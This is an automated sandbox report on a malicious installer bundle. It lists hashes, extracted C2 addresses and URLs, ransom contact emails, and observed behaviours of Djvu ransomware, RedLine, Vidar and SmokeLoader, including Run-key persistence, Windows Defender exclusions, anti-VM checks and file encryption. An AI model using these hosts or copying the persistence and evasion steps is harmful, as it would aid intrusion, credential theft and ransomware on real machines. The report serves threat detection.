Resubmissions
submitted  analysis id  score
30-09-2021 05:45  210930-gf4veagef9  10
29-09-2021 21:32  210929-1dyp6agaam  10
29-09-2021 18:54  210929-xkfldaffb2  10

Analysis
max time kernel: 1802s
max time network: 1805s
platform: windows10_x64
resource: win10-de-20210920
submitted: 29-09-2021 21:32
Static task: static1
Behavioral task behavioral1: sample setup_x86_x64_install.exe, resource win7-ja-20210920
Behavioral task behavioral2: sample setup_x86_x64_install.exe, resource win7v20210408
Behavioral task behavioral3: sample setup_x86_x64_install.exe, resource win7-de-20210920
Behavioral task behavioral4: sample setup_x86_x64_install.exe, resource win11
Behavioral task behavioral5: sample setup_x86_x64_install.exe, resource win10v20210408
Behavioral task behavioral6: sample setup_x86_x64_install.exe, resource win10-ja-20210920
Behavioral task behavioral7: sample setup_x86_x64_install.exe, resource win10-en-20210920
Behavioral task behavioral8: sample setup_x86_x64_install.exe, resource win10-de-20210920
General
Target: setup_x86_x64_install.exe
Size: 7.1MB
MD5: cd08a9c57ce8115745d3a99dec48847d
SHA1: 2ea5cea16935f511935a86ea7a2903a44d593247
SHA256: 52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc
SHA512: 0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233
Malware Config
Extracted: http://shellloader.top/welcome
Extracted (djvu, from C:\_readme.txt): manager@mailtemp.ch, supporthelp@airmail.cc, https://we.tl/t-2zbBkO06mv
Extracted (redline, ANI): 45.142.215.47:27643
Extracted (redline, jamesfuck): 65.108.20.195:6774
Extracted (smokeloader, 2020): http://gmpeople.com/upload/, http://mile48.com/upload/, http://lecanardstsornin.com/upload/, http://m3600.com/upload/, http://camasirx.com/upload/
Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | OneDriveSetup.exe

Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1500 | 5448 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5560 | 5448 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4980 | 5448 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 10636 | 5448 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 10308 | 5448 | rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 4 IoCs
Processes:
resource | yara_rule
behavioral8/memory/5024-265-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral8/memory/5024-270-0x000000000041C5CA-mapping.dmp | family_redline
behavioral8/memory/1852-310-0x0000000002160000-0x000000000217F000-memory.dmp | family_redline
behavioral8/memory/1852-325-0x00000000023C0000-0x00000000023DE000-memory.dmp | family_redline

Registers COM server for autorun 1 TTPs

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exe | family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 6872 created 4496 | 6872 | WerFault.exe | ShadowVPNInstaller_t1.exe
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Tnega Activity (GET)
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Vidar Stealer 4 IoCs
Processes:
resource | yara_rule
behavioral8/memory/4348-301-0x0000000002120000-0x00000000021F4000-memory.dmp | family_vidar
behavioral8/memory/4348-332-0x0000000000400000-0x00000000004D7000-memory.dmp | family_vidar
behavioral8/memory/3968-408-0x0000000002260000-0x0000000002334000-memory.dmp | family_vidar
behavioral8/memory/3968-428-0x0000000000400000-0x00000000004D7000-memory.dmp | family_vidar

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurlpp.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libstdc++-6.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libstdc++-6.dll | aspack_v212_v242

Blocklisted process makes network request 64 IoCs
Processes:
flow | pid | process
43 | 764 | cmd.exe
73 | 764 | cmd.exe
96 | 764 | cmd.exe
108 | 764 | cmd.exe
116 | 764 | cmd.exe
132 | 764 | cmd.exe
158 | 764 | cmd.exe
163 | 5768 | powershell.exe
170 | 4912 | powershell.exe
173 | 764 | cmd.exe
176 | 764 | cmd.exe
178 | 7412 | WMIC.exe
29 | 764 | cmd.exe
17 | 764 | cmd.exe
43 | 764 | cmd.exe
96 | 764 | cmd.exe
73 | 764 | cmd.exe
108 | 764 | cmd.exe
116 | 764 | cmd.exe
158 | 764 | cmd.exe
132 | 764 | cmd.exe
233 | 6304 | cmd.exe
239 | 7832 | schtasks.exe
242 | 2684 | cmd.exe
243 | 7832 | schtasks.exe
244 | 2684 | cmd.exe
245 | 7832 | schtasks.exe
248 | 7832 | schtasks.exe
262 | 7832 | schtasks.exe
263 | 7832 | schtasks.exe
264 | 7832 | schtasks.exe
265 | 7832 | schtasks.exe
384 | 4912 | powershell.exe
601 | 6856 | cmd.exe
681 | 4660 | MsiExec.exe
682 | 4660 | MsiExec.exe
683 | 4660 | MsiExec.exe
685 | 4660 | MsiExec.exe
689 | 4660 | MsiExec.exe
690 | 4660 | MsiExec.exe
691 | 4660 | MsiExec.exe
692 | 4660 | MsiExec.exe
693 | 4660 | MsiExec.exe
696 | 4660 | MsiExec.exe
697 | 4660 | MsiExec.exe
699 | 4660 | MsiExec.exe
701 | 4660 | MsiExec.exe
702 | 4660 | MsiExec.exe
703 | 4660 | MsiExec.exe
704 | 4660 | MsiExec.exe
705 | 4660 | MsiExec.exe
706 | 4660 | MsiExec.exe
707 | 4660 | MsiExec.exe
709 | 4660 | MsiExec.exe
711 | 4660 | MsiExec.exe
712 | 4660 | MsiExec.exe
716 | 4660 | MsiExec.exe
717 | 4660 | MsiExec.exe
719 | 4660 | MsiExec.exe
720 | 4660 | MsiExec.exe
721 | 4660 | MsiExec.exe
723 | 4660 | MsiExec.exe
725 | 4660 | MsiExec.exe
726 | 4660 | MsiExec.exe

Creates new service(s) 1 TTPs

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Sayma.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DllHost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | reg.exe

Executes dropped EXE 64 IoCs
Processes:
pid | process
1116 | setup_installer.exe
1708 | setup_install.exe
1852 | Wed151f5e3fd2.exe
3840 | Wed15228d911b9d5c.exe
2648 | Wed1529d8198a8f0c1.exe
764 | Wed15ac1df9305ded09.exe
1080 | Wed15cdfe4f1ee8.exe
980 | Wed154a69e494d5e99ca.exe
4136 | Wed150b6a68b74a9.exe
4160 | Wed15e2f113a40ce5.exe
4268 | Wed15fbd6ef41b4f.exe
4284 | Wed15bfd6504f7748c.exe
4300 | Wed15edb855a49.exe
4348 | Wed15c2e7469a14dca.exe
4372 | postback.exe
4392 | Wed15566afaea59e.exe
4512 | Wed15fbd6ef41b4f.tmp
4968 | LzmwAqmV.exe
4780 | Wed15e2f113a40ce5.exe
5060 | Sayma.exe
3732 | Chrome 5.exe
3968 | Firstoffer.exe
4388 | chrome.exe
920 | SkVPVS3t6Y8W.EXe
4496 | ShadowVPNInstaller_t1.exe
5024 | Wed15e2f113a40ce5.exe
1812 | 1631231.scr
4672 | Install.EXE
4852 | Install.exe
3800 | reg.exe
4460 | 7712201.scr
2380 | setup.exe
316 | sfx_123_206.exe
4276 | 6517854.scr
4228 | mshta.exe
5232 | WinHoster.exe
5248 | jhuuee.exe
5392 | 6020523.scr
5404 | setup_2.tmp
5456 | pli-game.exe
5620 | Conhost.exe
6044 | schtasks.exe
5504 | setup_2.tmp
5528 | 2610751.scr
6140 | 6571754.scr
2216 | 4MCYlgNAW.eXE
4408 | 5795491.scr
4372 | postback.exe
6216 | build3.exe
7072 | services64.exe
7136 | ultramediaburner.exe
5592 | Gixesemegy.exe
6332 | ultramediaburner.tmp
6336 | Lyshopadiqi.exe
5828 | UltraMediaBurner.exe
4896 | Conhost.exe
5868 | Install.exe
2772 | INSTAL~1.EXE
6304 | cmd.exe
3568 | installer.exe
7412 | WMIC.exe
7680 | sihost64.exe
7768 | gcleaner.exe
7948 | autosubplayer.exe

Modifies Windows Firewall 1 TTPs

Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File renamed | C:\Users\Admin\Pictures\EnableDisconnect.tiff => C:\Users\Admin\Pictures\EnableDisconnect.tiff.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\PublishUnlock.tif => C:\Users\Admin\Pictures\PublishUnlock.tif.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\SendInitialize.png => C:\Users\Admin\Pictures\SendInitialize.png.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\SwitchComplete.crw => C:\Users\Admin\Pictures\SwitchComplete.crw.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\WriteExit.raw => C:\Users\Admin\Pictures\WriteExit.raw.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\ConvertFromMount.tiff => C:\Users\Admin\Pictures\ConvertFromMount.tiff.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\DisconnectCheckpoint.png => C:\Users\Admin\Pictures\DisconnectCheckpoint.png.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\UnblockAssert.tiff => C:\Users\Admin\Pictures\UnblockAssert.tiff.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\WatchSubmit.crw => C:\Users\Admin\Pictures\WatchSubmit.crw.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\RenameRestart.tif => C:\Users\Admin\Pictures\RenameRestart.tif.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\SplitStep.crw => C:\Users\Admin\Pictures\SplitStep.crw.rigd | DCCF.exe
File opened for modification | C:\Users\Admin\Pictures\ConvertFromMount.tiff | DCCF.exe
File opened for modification | C:\Users\Admin\Pictures\UnblockAssert.tiff | DCCF.exe
File renamed | C:\Users\Admin\Pictures\ResumeGroup.crw => C:\Users\Admin\Pictures\ResumeGroup.crw.rigd | DCCF.exe
File renamed | C:\Users\Admin\Pictures\ConfirmBackup.crw => C:\Users\Admin\Pictures\ConfirmBackup.crw.rigd | DCCF.exe
File opened for modification | C:\Users\Admin\Pictures\EnableDisconnect.tiff | DCCF.exe
Checks BIOS information in registry 2 TTPs 25 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2483.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Z58YFjny287dHiWTdWlvNYF0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Z2ECp8JodQbWGsvkzsmoyMv5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | E60.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6517854.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6642635.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5957.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2483.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Wed15566afaea59e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Wed15566afaea59e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6517854.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6642635.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Money10k_.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Money10k_.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5957.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Z58YFjny287dHiWTdWlvNYF0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Z2ECp8JodQbWGsvkzsmoyMv5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | OITjDfOmO1EwVIRrcSQjebGx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | E60.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5795491.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5795491.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | OITjDfOmO1EwVIRrcSQjebGx.exe

Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Qoshaemejyjy.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | bXhtqdI.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Gixesemegy.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | qT3dWYBP7ZsuOrwW4ZcUbjl6.exe

Loads dropped DLL 64 IoCs
Processes:
pid | process
1708 | setup_install.exe
1708 | setup_install.exe
1708 | setup_install.exe
1708 | setup_install.exe
1708 | setup_install.exe
4512 | Wed15fbd6ef41b4f.tmp
5404 | setup_2.tmp
5344 | rundll32.exe
5504 | setup_2.tmp
5736 | forfiles.exe
6992 | rundll32.EXE
6992 | rundll32.EXE
6392 | rundll32.exe
6820 | Conhost.exe
6820 | Conhost.exe
4744 | rundll32.exe
4348 | Wed15c2e7469a14dca.exe
4348 | Wed15c2e7469a14dca.exe
3968 | Firstoffer.exe
3968 | Firstoffer.exe
3568 | installer.exe
3568 | installer.exe
7948 | autosubplayer.exe
3568 | installer.exe
8120 | MsiExec.exe
8120 | MsiExec.exe
7948 | autosubplayer.exe
8580 | Helper.exe
6196 | rundll32.exe
1280 | choice.exe
1280 | choice.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
7948 | autosubplayer.exe
7948 | autosubplayer.exe
7948 | autosubplayer.exe
8584 | IX1zGxX9efDhwsZ12BGQ_ajS.tmp
1448 | build2.exe
1448 | build2.exe
7948 | autosubplayer.exe
10224 | reg.exe
7948 | autosubplayer.exe
4640 | autosubplayer.exe
10908 | rundll32.exe
10908 | rundll32.exe
4640 | autosubplayer.exe
7948 | autosubplayer.exe
7948 | autosubplayer.exe
4760 | rundll32.exe
7948 | autosubplayer.exe
7384 | rundll32.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
3568 | installer.exe
4660 | MsiExec.exe
4660 | MsiExec.exe
10020 | MsiExec.exe
10020 | MsiExec.exe
Modifies file permissions 1 TTPs 1 IoCs

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exe | themida
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exe | themida
behavioral8/memory/4392-222-0x0000000000A90000-0x0000000000A91000-memory.dmp | themida

Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" | rundll32.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OnpGSK = "0" | rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 14 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | Conhost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Raeletolamae.exe\"" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | OneDriveSetup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | Install.EXE
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | Installer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 7712201.scr
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | Conhost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | Installer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6119ec7f-c167-4e31-946b-c0e87ad60709\\DCCF.exe\" --AutoStart" | DCCF.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\kaklvdty = "\"C:\\Users\\Admin\\yojvpbfx.exe\"" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | Install.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gaxofofomy.exe\"" | Sayma.exe

Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | schtasks.exe
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Wed15566afaea59e.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5795491.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | FC10.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Z58YFjny287dHiWTdWlvNYF0.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | OITjDfOmO1EwVIRrcSQjebGx.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6642635.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Money10k_.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6517854.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Z2ECp8JodQbWGsvkzsmoyMv5.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | E60.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | OtZ3Bgr_O8lNYovkhfW9MgZl.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5957.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 2483.exe

Drops Chrome extension 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json | bXhtqdI.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json | bXhtqdI.exe

Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | bXhtqdI.exe
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (24 entries) | installer.exe
File opened (read-only) | \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (24 entries) | msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
ioc | flow
api.2ip.ua | 341, 342, 459, 461, 1111, 1112, 1241, 1242, 1303, 1451, 1452
ip-api.com | 4, 276
api.ipify.org | 807, 808
ipapi.co | 532, 533, 778
icanhazip.com | 809
ipinfo.io | 85, 86, 247, 248, 305
Drops file in System32 directory 64 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent A998981BC79FBDF7 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Azure-Update-Task | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #5 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 | bXhtqdI.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | cmd.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 | bXhtqdI.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | OOWUeMc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 | bXhtqdI.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Time Trigger Task | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\gOWWqevQB | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | bXhtqdI.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 84062D3243A98AFE | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\gYUSnSWDi | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
